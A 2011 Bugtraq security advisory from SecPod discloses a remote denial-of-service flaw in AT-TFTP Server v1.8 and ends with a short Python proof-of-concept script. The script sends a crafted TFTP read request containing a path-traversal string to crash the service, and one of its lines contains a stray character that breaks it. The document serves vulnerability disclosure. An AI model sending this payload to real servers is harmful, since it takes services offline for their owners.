[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
AT-TFTP Server Remote Denial of Service Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: AT-TFTP Server Remote Denial of Service Vulnerability
- From: SecPod Research <research@xxxxxxxxxx>
- Date: Mon, 25 Apr 2011 15:31:19 +0530
Hi,
SecPod Research Team Member Antu Sanadi has found a DoS
Vulnerability in AT-TFTP Server
Advisory and POC details has been attached to this mail.
Regards,
SecPod Research Team
http://www.secpod.com
###############################################################################
AT-TFTP Server v1.8 Remote Denial of Service Vulnerability
SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################
SecPod ID: 1013 01/04/2011 Issue Discovered
04/04/2011 Vendor Notified
No Response from the Vendor
25/04/2011 Advisory Released
Class: Denial of Service Severity: High
Overview:
---------
AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability
as it fails to handle 'read' requests from the client properly.
Technical Description:
----------------------
The vulnerability is caused by an error in the "TFTPD.EXE" which causes the
server to crash when no acknowledgement response is sent back to the server
after a successful 'read'.
Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.
Affected Software:
------------------
AT-TFTP Server version 1.8
Tested on,
AT-TFTP Server version 1.8 on Windows XP SP3
References:
-----------
http://secpod.org/blog/?p=194
http://www.alliedtelesis.co.nz/
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt
Proof of Concept:
----------------
http://secpod.org/blog/?p=194
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
Solution:
----------
Not available
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)
Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.
#!/usr/bin/python
##############################################################################
# Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
# http://secpod.org/wintftp_dos_poc.py
# Reference :
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################
import socket
import sys
host = '127.0.0.1'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
addr = (host,port)1
data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))